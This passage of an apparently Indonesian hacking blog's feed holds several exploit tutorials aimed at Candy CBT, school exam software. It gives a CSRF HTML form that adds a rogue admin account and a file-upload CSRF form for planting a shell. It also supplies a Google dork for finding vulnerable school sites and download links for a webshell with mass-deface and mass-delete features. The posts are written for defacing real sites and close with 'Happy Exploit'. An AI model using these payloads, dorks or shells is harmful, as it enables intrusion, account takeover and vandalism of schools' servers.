&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRx0NYDf-bZdx0IEKwrVRGRK2btM2TTv947R_sfRWhUa6kF4itNyVvmbt4qND7L_kMPgs5vuNCV1WqdSnpUOtK6Tzdm6m4RViHEYCqvulY-0KoF34lUj3Ns4H_sGr0BgikBbFWG1_d2gin/s1600/S00605-044334.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRx0NYDf-bZdx0IEKwrVRGRK2btM2TTv947R_sfRWhUa6kF4itNyVvmbt4qND7L_kMPgs5vuNCV1WqdSnpUOtK6Tzdm6m4RViHEYCqvulY-0KoF34lUj3Ns4H_sGr0BgikBbFWG1_d2gin/s320/S00605-044334.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Terdapat Text : &lt;b&gt;Data Berhasil Di Restore&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Sekarang Kita Panggil Shell Atau Sc Kalian Seperti Ini..&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;https://candy.com/admin/shell-kalian&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;Or&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;https://candy.com/[patch]/admin/shell-kalian&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;And Boom&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQDCJrGEgBDRDU9F3bzVlYME4GJmq_leXsNoGsRyXHkw9pD0woSqHs7AUm_XEimHl-2pJxPjLwBXLEKcB_WBtY0Mq59t8Hcrw5QeLorQSfpPYB7LNBcljQYxHk6GAzj0j_j9APmUhb3lFK/s1600/S00605-044712.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQDCJrGEgBDRDU9F3bzVlYME4GJmq_leXsNoGsRyXHkw9pD0woSqHs7AUm_XEimHl-2pJxPjLwBXLEKcB_WBtY0Mq59t8Hcrw5QeLorQSfpPYB7LNBcljQYxHk6GAzj0j_j9APmUhb3lFK/s320/S00605-044712.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Sekian..&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
Happy Exploit And Happy Hacking..&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/7335585688530664938/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/candy-cbt-28-afu-arbritrary-file-upload.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/7335585688530664938'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/7335585688530664938'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/candy-cbt-28-afu-arbritrary-file-upload.html' title='Candy Cbt 2.8 AFU (Arbritrary File Upload) With Csrf'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibVgcDrTb2lSgdzayY8QNpvUpQXohlrdVPdJww_9oKdPR8UtyFn8O34GUSwN6hSvirPR458_ipZWHNziLZhWXGc71JU_jyS9-1G-KaezdyKFxdu-vqYAHkXcbBZNzU5asSsi0LZKNFZx2t/s72-c/IMG-20200514-WA0711.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6489984007671150282</id><published>2020-05-27T03:12:00.000+07:00</published><updated>2020-05-27T03:13:22.425+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit Candy Cbt 2.8 Add User With Csrf</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqo1EJhLkl1TJxdeImjyBpCHMtITBU__8H474mq5HB9edULiCgPTT-mCEsOlwuPr8YOmzE-Tsa9qnCemx4NlsoG24VFZivtFNo-5H3C5kaPZxhQsJzmeh85KlONgNrBic48NblP2LvpI1R/s1600/FB_IMG_15899603832933782.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;746&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqo1EJhLkl1TJxdeImjyBpCHMtITBU__8H474mq5HB9edULiCgPTT-mCEsOlwuPr8YOmzE-Tsa9qnCemx4NlsoG24VFZivtFNo-5H3C5kaPZxhQsJzmeh85KlONgNrBic48NblP2LvpI1R/s320/FB_IMG_15899603832933782.jpg&quot; width=&quot;308&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Kali Ini Ane Akan Share Exploit Candy Cbt V2.8...&lt;br /&gt;
&lt;br /&gt;
Karna Dari Dulu Sering Ane Lihat Di Komen&amp;nbsp;&amp;nbsp;&quot;&lt;b&gt;Candy Cbt Yang 2.8 Dah Ada??, Gan Cbt 2.8 Mana??, Dst&lt;/b&gt;&quot;&lt;br /&gt;
&lt;br /&gt;
Wkwkwk Sabar Gan Ntar Ane Cari...&lt;br /&gt;
&lt;br /&gt;
Nah Disini Ane Langsung Share Aja Caranya Kek Gimana wkwkw...&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Pertama Kalian Copas Csrf Di Bawah Gan..&lt;/li&gt;
&lt;/ul&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th&gt;&lt;div style=&quot;overflow: auto; text-align: left;&quot;&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;body&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&amp;lt;form action=&quot;http://candycbt28.sch.id/admin/?pg=pengawas&quot; method=&quot;post&quot;&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;label&amp;gt;NIP&amp;lt;/label&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;text&quot; name=&quot;nip&quot; value=&quot;-&quot; required=&quot;true&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;label&amp;gt;Nama&amp;lt;/label&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;text&quot; name=&quot;nama&quot; required=&quot;true&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;label&amp;gt;Username&amp;lt;/label&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;text&quot; name=&quot;username&quot; required=&quot;true&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;label&amp;gt;Password&amp;lt;/label&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;password&quot; name=&quot;pass1&quot; required=&quot;true&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;label&amp;gt;Ulang Password&amp;lt;/label&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;password&quot; name=&quot;pass2&quot; required=&quot;true&quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;button type=&quot;submit&quot; name=&quot;submit&quot;&amp;gt;Simpan&amp;lt;/button&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;Nah Kalo Udah Kalian Copy Csrf Tersebut Kalian Masukan Sitenya *&lt;b&gt;Note : &lt;/b&gt;&lt;i&gt;Untuk Bagian Nip Kalian Tidak Usah Di Edit Lagi Biarkan Saja Seperti Itu&lt;/i&gt;*&lt;/li&gt;
&lt;li&gt;Nah Jika Sudah Memasukan Site Nya Kalian Buka Csrfnya Gan Di Google Lalu Isikan Terserah Kalian, Contoh Seperti Gambar Berikut...&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLwIKgzSZdyXgJwPJbT-69YQyLrWG9BoE_nPDv2ouMyjORCipKTqh0PqWi61rMYp5-Zjxu6uow-KXv-H48w-BovddB3ApZjPliAN3bqNVmqf-XyGJFwBD6rjhzQIVFfmpm-QOEFaorXPN/s1600/S00527-030331.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLwIKgzSZdyXgJwPJbT-69YQyLrWG9BoE_nPDv2ouMyjORCipKTqh0PqWi61rMYp5-Zjxu6uow-KXv-H48w-BovddB3ApZjPliAN3bqNVmqf-XyGJFwBD6rjhzQIVFfmpm-QOEFaorXPN/s320/S00527-030331.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Di Gambar Tersebut Saya Isikan Nama Username Dan Password, Untuk Username Dan Passwordnya Yaitu&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;-Username : &lt;/b&gt;&lt;i&gt;hari&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;-Password : &lt;/b&gt;&lt;i&gt;ecchi&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Jika Kalian Sudah isikan Kalian Tinggal Simpan Saja Gan..&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Kalian Masuk Ke Page Login Admin Dan Masukan Username Passwordnya Yang Sudah Kalian Buat Tadi&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5F5TFfsZ3SJg1NvEGUKi5Mz_aUP1MUe7qyxq_2HnMpj99quHMMkzdDkB9J09Xcsn-Y3mK941aoPd8PS06mouNUFDKSflP6NLug2-wykM-rfaIRzQvuxtR1ZMqBbH_xmaiKSZQIQ-y2jeP/s1600/S00527-030910.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5F5TFfsZ3SJg1NvEGUKi5Mz_aUP1MUe7qyxq_2HnMpj99quHMMkzdDkB9J09Xcsn-Y3mK941aoPd8PS06mouNUFDKSflP6NLug2-wykM-rfaIRzQvuxtR1ZMqBbH_xmaiKSZQIQ-y2jeP/s320/S00527-030910.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Tinggal Masuk Deh...&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Dan Boom&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaOZIeyfDSCnd-8-poLhM0LzmhgpvoJgqUmupDy_F9g6DWF5NrJAh8Cio762ZMmukt2aaDu1pQVlSEgErnVGL_M0qCHRy_WIOFfytyfiwMlz-UtxzbCruC6VDbacl9UT9B0fSieMnSrtQf/s1600/S00527-031031.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaOZIeyfDSCnd-8-poLhM0LzmhgpvoJgqUmupDy_F9g6DWF5NrJAh8Cio762ZMmukt2aaDu1pQVlSEgErnVGL_M0qCHRy_WIOFfytyfiwMlz-UtxzbCruC6VDbacl9UT9B0fSieMnSrtQf/s320/S00527-031031.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Kalian Masuk Dahboard Adminnya Nah Sekarang Terserah Kalian...&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Mau Apakan Gan...&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Oh Iya Disini Saya Gak Buat Dork Kalian Buat Saja Sendiri...&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
Semoga Berhasil...&amp;nbsp;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6489984007671150282/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/exploit-candy-cbt-28-add-user-with-csrf.html#comment-form' title='5 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6489984007671150282'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6489984007671150282'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/exploit-candy-cbt-28-add-user-with-csrf.html' title='Exploit Candy Cbt 2.8 Add User With Csrf'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqo1EJhLkl1TJxdeImjyBpCHMtITBU__8H474mq5HB9edULiCgPTT-mCEsOlwuPr8YOmzE-Tsa9qnCemx4NlsoG24VFZivtFNo-5H3C5kaPZxhQsJzmeh85KlONgNrBic48NblP2LvpI1R/s72-c/FB_IMG_15899603832933782.jpg" height="72" width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-2776595209770836735</id><published>2020-05-23T01:20:00.000+07:00</published><updated>2020-05-23T01:41:10.596+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><title type='text'>Konosuba Webshell</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://images8.alphacoders.com/787/787504.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;500&quot; data-original-width=&quot;800&quot; height=&quot;200&quot; src=&quot;https://images8.alphacoders.com/787/787504.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hallo Gan..&lt;br /&gt;
Gak Kerasa Mau Lebaran Lagi Wkwkw...&lt;br /&gt;
Kalo Ane Ada Salah Minta Maaf Yah Buat Kalian Semua...&lt;br /&gt;
&lt;br /&gt;
Nah Kali Ini Ane Akan Share Konosuba Shell..&lt;br /&gt;
&lt;br /&gt;
Untuk Tampilan Kalian Di Bawah Ini..&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXqivf2q7B_i4Wj-MEkPvUhv0GShzYhF5ZwS-Bu4SIIK6F4nGpyPrrdNS26BD_GOAz7nbEPMjCW-GNV_yU1mhb8fERQAtnAzV_gNzsKvDHHGY5DrRWIaezj5zTuFOY56su-mh0Un1ujd6/s1600/S00523-010503.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXqivf2q7B_i4Wj-MEkPvUhv0GShzYhF5ZwS-Bu4SIIK6F4nGpyPrrdNS26BD_GOAz7nbEPMjCW-GNV_yU1mhb8fERQAtnAzV_gNzsKvDHHGY5DrRWIaezj5zTuFOY56su-mh0Un1ujd6/s320/S00523-010503.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxA-RcCgDV2O_T0B7VYsQYk-MCtvxY7caNXDR9bxmTUBAywHqxi7QPtBsKYWE2MqSv7n8ycGairk-jA0PcgO14bVxq0INLnd02CTZ_2hHlFmVS2nsdDdJmZmBZ6UrFQbuUMnIBhRRXmKYi/s1600/S00523-010611.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxA-RcCgDV2O_T0B7VYsQYk-MCtvxY7caNXDR9bxmTUBAywHqxi7QPtBsKYWE2MqSv7n8ycGairk-jA0PcgO14bVxq0INLnd02CTZ_2hHlFmVS2nsdDdJmZmBZ6UrFQbuUMnIBhRRXmKYi/s320/S00523-010611.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Nah Seperti Itulah Untuk Fitur Yaitu&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Symlink&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Jumping&lt;/li&gt;
&lt;li&gt;Mass Deface/Mass Delete&lt;/li&gt;
&lt;li&gt;Dll ( Kalian Bisa Cek Di Gambar)&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Kalian Bisa Download&amp;nbsp;
&lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://pastebin.com/iVviVtmG&quot; target=&quot;_blank&quot;&gt;
  &lt;span class=&quot;circle2&quot;&gt;&lt;i class=&quot;fa fa-download&quot;&gt;&lt;/i&gt;&lt;/span&gt;
  &lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
  &lt;span class=&quot;title-hover2&quot;&gt;Disini&lt;/span&gt;&lt;/a&gt; Atau &lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://www31.zippyshare.com/v/vwh3NcGw/file.html&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;circle2&quot;&gt;&lt;i class=&quot;fa fa-download&quot;&gt;&lt;/i&gt;&lt;/span&gt;
  &lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
  &lt;span class=&quot;title-hover2&quot;&gt;Disini&lt;/span&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Semoga Digunakan Dengan Bijak :v</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/2776595209770836735/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/konosuba-webshell.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2776595209770836735'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2776595209770836735'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/konosuba-webshell.html' title='Konosuba Webshell'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXqivf2q7B_i4Wj-MEkPvUhv0GShzYhF5ZwS-Bu4SIIK6F4nGpyPrrdNS26BD_GOAz7nbEPMjCW-GNV_yU1mhb8fERQAtnAzV_gNzsKvDHHGY5DrRWIaezj5zTuFOY56su-mh0Un1ujd6/s72-c/S00523-010503.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6506430547780257974</id><published>2020-05-18T01:42:00.000+07:00</published><updated>2020-05-18T01:42:06.902+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Candy Cbt New Exploit</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbtH7fmTWYHe__nnmIcFRXLiwUZgtI6HUhmVOvDJda2LrcBeZgrOZBhcVyVZmenJo30tBuPrJ7sGTbBlrYAqXtYtuaxN9NoC5Fyf-8t7_uPwsL15fTE9ToV2xOB0oE-Mgxjz-ArHhR2AY6/s1600/IMG-20200510-WA0610.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1261&quot; data-original-width=&quot;736&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbtH7fmTWYHe__nnmIcFRXLiwUZgtI6HUhmVOvDJda2LrcBeZgrOZBhcVyVZmenJo30tBuPrJ7sGTbBlrYAqXtYtuaxN9NoC5Fyf-8t7_uPwsL15fTE9ToV2xOB0oE-Mgxjz-ArHhR2AY6/s320/IMG-20200510-WA0610.jpg&quot; width=&quot;186&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Lagi² Saya Menemukan Bug Di CBT Candy Bug Ini Bisa Di Ekse Di Semua Versi (Sepertinya Sih :&#39;v) Kecuali Yang v2.8 Wkwkw (Dah Lah Lagi² Yang V2.8 Belum Ada Bugnya :&#39;v)&lt;br /&gt;
&lt;br /&gt;
Langsung Aja Ke Tutornya..&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Disini Kalian Bisa Pake Csrf Online Atau Csrf Yang Di Bawah Ini Jika Menggunakan Csrf Online Maka Postfilenya Ialah &lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: lime;&quot;&gt;logo&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th&gt;&lt;div style=&quot;overflow: auto; text-align: left;&quot;&gt;
&lt;div&gt;
&amp;lt;form action=&quot;https://site.sch.id/admin/simpan_setting.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;input type=&quot;file&quot; name=&quot;logo&quot; /&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;&amp;lt;button type=&quot;submit&quot; name=&quot;submit&quot;&amp;gt;Upload Filenya!!&amp;lt;/button&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&amp;lt;/form&amp;gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;Exploit :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;i&gt;&lt;span style=&quot;color: lime;&quot;&gt;/admin/simpan_setting.php&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Dork :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: lime;&quot;&gt;&lt;i&gt;&lt;u&gt;Candy Cbt &quot;login masuk&quot;&lt;/u&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Kita Dorking Dulu Gan Gunakan Dork Yang Saya Buat Di Atas Tadi (Kebangin Gan Dorknya)&lt;/li&gt;
&lt;li&gt;Jika Kita Sudah Menemukan Target Langsung Masukan Exploitnya Jika Blank Atau Ke Redirect Kek Login Page Artinya Site Tersebut Vuln Gan&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
